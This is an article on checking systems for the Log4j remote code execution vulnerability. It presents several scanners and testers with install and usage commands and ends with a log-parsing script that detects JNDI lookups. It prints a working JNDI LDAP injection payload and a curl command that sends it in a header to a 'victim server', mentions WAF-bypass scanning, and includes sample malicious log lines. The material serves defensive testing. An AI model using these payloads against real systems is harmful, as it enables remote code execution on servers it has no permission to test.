Log4j is a widely used Java logging library for recording security and performance information. Security experts discovered a zero-day vulnerability in the popular library, affecting many enterprise IT systems. Several vendors released tools, but a second vulnerability was discovered shortly afterwards, and the Apache Software Foundation pushed out a new fix after that. If your system has any Java application using a version of Log4j before 2.14.1, you should act very quickly. You can quickly check your systems for the Log4j vulnerability with the following tools.
Apache Log4j CVE-2021-44228 Scanner
Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is run the open-source tool Apache Log4j CVE-2021-44228 Scanner, developed by Adil Soybali, a security researcher at Seccops Cyber Security Technologies Inc.
Features
- Scanning according to the URL list you provide.
- Scanning by finding the subdomains of the provided domain name.
- Adding the scanned domain as a prefix so you can tell which target the incoming DNS queries come from.
Requirements
Installation
git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh
Usage
./log4j-rce-scanner.sh -h
This will display help for the tool. Here are all the switches it supports.
-h, --help - Display help
-l, --url-list - List of domains/subdomains/IPs to be used for scanning.
-d, --domain - The domain name to check, together with all of its subdomains.
-b, --burpcollabid - Burp Collaborator client ID address or interactsh domain address.
Example usage:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net

- Burp collaborator documentation page
- Easy way to set up a custom Burp Collaborator instance in a docker environment
- Interactsh
Official GitHub Repository
CISA Log4j Scanner
https://github.com/cisagov/log4j-scanner
This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository are provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; false negatives may occur.
Usage
Scan a Single URL
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local
Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests
Discover WAF bypasses on the environment.
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass
Scan a list of URLs
$ python3 log4j-scan.py -l urls.txt
Huntress Labs log4shell tester
https://log4shell.huntress.com
This tester provides a payload with a unique identifier, accepts LDAP connections from vulnerable apps, and displays the IP addresses from which connections were received. The sample payload shown below can also be used for this test.
Usage
You simply copy and paste the generated JNDI syntax (payload), i.e. the ${jndi[:]ldap[:]//.... code block presented below, into any input the application logs: application input boxes, front-end form fields, login fields such as the username input, or, if you are a bit more technical, even the User-Agent, X-Forwarded-For or other customizable HTTP headers.
Sample Code (Payload):
${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}
How to send the Log4j payload to the victim server?
- You can send the payload to the victim server using a user agent switcher extension on your web browser.
- You can also send a curl request to the victim server via the Linux terminal.
curl http://vulnerable-app:8080 \
  -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'
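On the defender's side, the same JNDI lookup string turns up in request logs when a test (or an attacker) sends it. The following Python script is an added example, not part of the original article or any of the tools above: it scans access log lines for the ${jndi:...} pattern and extracts the callback scheme, host and port, so you can separate your own Huntress test runs from callbacks to hosts you do not recognise. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access log (not from the original page). Line 2 carries the
# Huntress test payload in the User-Agent field; line 3 carries an unknown RMI callback.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:12:07 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://log4shell.huntress.com:1389/abc123}"
10.0.0.9 - - [10/Dec/2021:10:13:40 +0000] "POST /api HTTP/1.1" 500 88 "-" "${JNDI:RMI://203.0.113.7:1099/x}"
"""

# Case-insensitive match for a JNDI lookup; the group captures the URI it would resolve.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<uri>[^}]+)\}", re.IGNORECASE)

# Callback hosts you expect to see while running the Huntress tester yourself.
KNOWN_TEST_HOSTS = {"log4shell.huntress.com"}


def find_jndi_lookups(line):
    """Return (scheme, host, port) for every JNDI lookup found in one log line."""
    hits = []
    for m in JNDI_RE.finditer(line):
        parts = urlsplit(m.group("uri").strip())  # scheme and hostname come back lowercased
        if parts.scheme and parts.hostname:
            hits.append((parts.scheme, parts.hostname, parts.port))
    return hits


def scan_log(text):
    """Return (line_no, source_ip, scheme, host, port, known_test) for each suspicious line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        src = line.split(" ", 1)[0]  # first field of a combined-format access log
        for scheme, host, port in find_jndi_lookups(line):
            findings.append((n, src, scheme, host, port, host in KNOWN_TEST_HOSTS))
    return findings


if __name__ == "__main__":
    for n, src, scheme, host, port, known in scan_log(SAMPLE_LOG):
        tag = "own test" if known else "UNKNOWN callback"
        print(f"line {n}: {src} -> {scheme}://{host}:{port} [{tag}]")
```

Point the script at your real web server, proxy or application logs; any callback host outside KNOWN_TEST_HOSTS warrants an incident response look, while a match on your own tester host confirms the payload reached the logging path.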
Trend Micro Log4j Vulnerability Tester
Usage
Watch the video below on how to use the Log4J tester.